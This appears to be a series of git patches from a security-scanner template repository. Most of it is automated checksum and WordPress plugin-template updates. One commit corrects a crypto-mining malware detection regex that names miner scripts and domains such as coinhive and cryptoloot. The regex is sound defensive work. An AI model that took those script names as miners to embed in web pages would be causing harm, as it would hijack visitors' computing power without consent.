-http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
-http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
-http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
+http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7186,7 +7186,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:9a08d6ff1213329cdf6a86542c0586417e055cfd
+templates-checksum.txt:0f6e00c21ab0d5d572cbbb3cde58bed7de2b9d98
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 953068cbd7923d4d4d6dd9df6763c905ed5d8084 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 21 Sep 2023 12:07:00 +0000
Subject: [PATCH 0477/1090] Auto Generated Templates Checksum [Thu Sep 21
 12:07:00 UTC 2023] :robot:

---
 templates-checksum.txt | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index a82dad9fe0..cfdc258cf3 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -8,8 +8,8 @@ TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0
 TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf
 TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:ac82ce259ec3cdb6c6dfa067fcccd0e6a3f81775
-cves.json-checksum.txt:6e5026f8eab48a5cd7d0f2a7052385bd9a0f4c24
+cves.json:4180679faab89e8b81a6724652ba1daa11c2946d
+cves.json-checksum.txt:fb3e450b753e98ad40d2ae441f41619fbcecbcf9
 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
@@ -607,7 +607,7 @@ http/cnvd/2022/CNVD-2022-43245.yaml:1cf34d3bee03bd6dc6aab3729d790f56c8bc6264
 http/cnvd/2022/CNVD-2022-86535.yaml:9dd03071fc9795f7ae4d99c59b3fd5342f5a5c70
 http/cnvd/2023/CNVD-2023-08743.yaml:1af1612ebc8033360c527b5a94c5e5276aac06ad
 http/cnvd/2023/CNVD-2023-12632.yaml:ceb1220ec85f8ba6607052d3ab2c9be79bd1a429
-http/cnvd/2023/CNVD-C-2023-76801.yaml:e3f9a0f364fcf716b2440c86680f5b402fa32a48
+http/cnvd/2023/CNVD-C-2023-76801.yaml:a04ba4c544a790bd157a7e139bf06c325359b449
 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2
 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:e265b0ef4cad374b888878d8ebe4cd4bfb3a4c2e
 http/credential-stuffing/cloud/atlassian-login-check.yaml:fdc2a219979a9c538febf42cd8170a6cd8f2eabe
@@ -7186,7 +7186,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:0f6e00c21ab0d5d572cbbb3cde58bed7de2b9d98
+templates-checksum.txt:ccdb31ce6e6817266259a78b75b323ceb7a67b58
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From a2ed235ca050fc41f668fe30a419a1b3579d5105 Mon Sep 17 00:00:00 2001
From: Patrik Fabian <34986756+fapami@users.noreply.github.com>
Date: Thu, 21 Sep 2023 22:12:53 +0200
Subject: [PATCH 0478/1090] Fix false positive for any min.2.1.js file

There is a false positive for any min.2.1.js file for example some-script-min.2.1.js would be matched. According to Adguard filters the crypto miner malware is named like .n.2.1.js so we can fix this with adding a necessary point character before n.

Adguard filters:
https://github.com/AdguardTeam/AdguardFilters/blob/master/BaseFilter/sections/cryptominers.txt
---
 http/miscellaneous/crypto-mining-malware.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/miscellaneous/crypto-mining-malware.yaml b/http/miscellaneous/crypto-mining-malware.yaml
index d8a08bc405..dcbc6182f7 100644
--- a/http/miscellaneous/crypto-mining-malware.yaml
+++ b/http/miscellaneous/crypto-mining-malware.yaml
@@ -24,7 +24,7 @@ http:
         part: body
         regex:
           - '(?mi)cryptonight\.wasm|deepMiner|proxy\=ws|coinhive\.min\.js|wpupdates\.github\.io\/ping|cryptonight\.asm\.js|coin-hive\.com|jsecoin\.com|cryptoloot\.pro'
-          - '(?mi)webassembly\.stream|monero\-miner|wasmminer|cn\-asmjs\.min\.js|aj(\-?)cryptominer|wp\-monero\-miner\-pro|crlt\.js|pool\/direct\.js|n\.2\.1\.(js|l.*)'
+          - '(?mi)webassembly\.stream|monero\-miner|wasmminer|cn\-asmjs\.min\.js|aj(\-?)cryptominer|wp\-monero\-miner\-pro|crlt\.js|pool\/direct\.js|\.n\.2\.1\.(js|l.*)'
           - '(?mi)ppoi\.org|xmrstudio|webmine\.pro|miner\.start|allfontshere\.press|upgraderservices\.cf|vuuwd\.com|gridcash\.js|worker\-asmjs\.min\.js|perfekt\=wss\:'
           - '(?mi)coin\-hive\.com|coinhive|CoinHive|miner\.start|me0w\.js|web(x?)mr(4?)\.js|miner\.js|static\/js\/tpb\.js|lib\/crypta\.js'
           - '(?mi)bitrix\/js\/main\/core\/core\_(tasker|loader)\.js'

From ee1762e4f6c90083cf93ceabecda58cc0971a516 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 22 Sep 2023 04:02:00 +0000
Subject: [PATCH 0479/1090] Auto WordPress Plugins Update [Fri Sep 22 04:02:00
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/ad-inserter.txt                       | 2 +-
 helpers/wordpress/plugins/antispam-bee.txt                      | 2 +-
 helpers/wordpress/plugins/jetpack.txt                           | 2 +-
 helpers/wordpress/plugins/ninja-forms.txt                       | 2 +-
 helpers/wordpress/plugins/premium-addons-for-elementor.txt      | 2 +-
 helpers/wordpress/plugins/seo-by-rank-math.txt                  | 2 +-
 helpers/wordpress/plugins/woocommerce-payments.txt              | 2 +-
 helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt      | 2 +-
 helpers/wordpress/plugins/wp-seopress.txt                       | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
